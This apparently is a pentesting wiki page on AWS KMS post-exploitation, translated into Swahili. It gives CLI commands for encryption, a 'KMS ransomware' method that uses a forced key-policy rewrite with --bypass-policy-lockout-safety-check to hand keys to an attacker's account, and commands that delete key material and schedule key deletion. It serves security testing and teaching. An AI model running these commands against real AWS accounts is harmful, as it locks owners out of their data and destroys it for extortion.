AWS - KMS Post Exploitation

Reading time: 5 minutes

KMS

Kwa maelezo zaidi angalia:

AWS - KMS Enum

Encrypt/Decrypt information

fileb:// na file:// ni mipango ya URI inayotumika katika amri za AWS CLI kubaini njia ya faili za ndani:

• fileb://: Inasoma faili kwa njia ya binary, inayotumika kawaida kwa faili zisizo za maandiko.
• file://: Inasoma faili kwa njia ya maandiko, inayotumika kawaida kwa faili za maandiko safi, skripti, au JSON ambayo haina mahitaji maalum ya uandishi.

• Kutumia funguo symmetric

# Encrypt data
aws kms encrypt \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--output text \
--query Plaintext | base64 \
--decode

• Kutumia asymmetric key:

# Encrypt data
aws kms encrypt \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--output text \
--query Plaintext | base64 \
--decode

KMS Ransomware

Mshambuliaji mwenye ufikiaji wa haki juu ya KMS anaweza kubadilisha sera ya KMS ya funguo na kutoa ufikiaji wa akaunti yake juu yao, akiondoa ufikiaji uliopewa akaunti halali.

Hivyo, watumiaji wa akaunti halali hawataweza kufikia taarifa yoyote ya huduma yoyote ambayo imekuwa imefichwa kwa kutumia funguo hizo, na kuunda ransomware rahisi lakini yenye ufanisi juu ya akaunti hiyo.

Pia kumbuka hitaji la kutumia param --bypass-policy-lockout-safety-check (ukosefu wa chaguo hili kwenye konsoli ya wavuti unafanya shambulio hili liwezekane tu kutoka CLI).

# Force policy change
aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
--policy-name default \
--policy file:///tmp/policy.yaml \
--bypass-policy-lockout-safety-check

{
"Id": "key-consolepolicy-3",
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<your_own_account>:root"
},
"Action": "kms:*",
"Resource": "*"
}
]
}

Generic KMS Ransomware

Global KMS Ransomware

Kuna njia nyingine ya kutekeleza KMS Ransomware ya kimataifa, ambayo itahusisha hatua zifuatazo:

• Kuunda funguo mpya yenye nyenzo za funguo zilizowekwa na mshambuliaji
• Kurejesha data ya zamani iliyosimbwa kwa toleo la awali na ile mpya.
• Futa funguo za KMS
• Sasa ni mshambuliaji tu, ambaye ana nyenzo za funguo za awali anaweza kufungua data iliyosimbwa.

Destroy keys

# Destoy they key material previously imported making the key useless
aws kms delete-imported-key-material --key-id 1234abcd-12ab-34cd-56ef-1234567890ab

# Schedule the destoy of a key (min wait time is 7 days)
aws kms schedule-key-deletion \
--key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \
--pending-window-in-days 7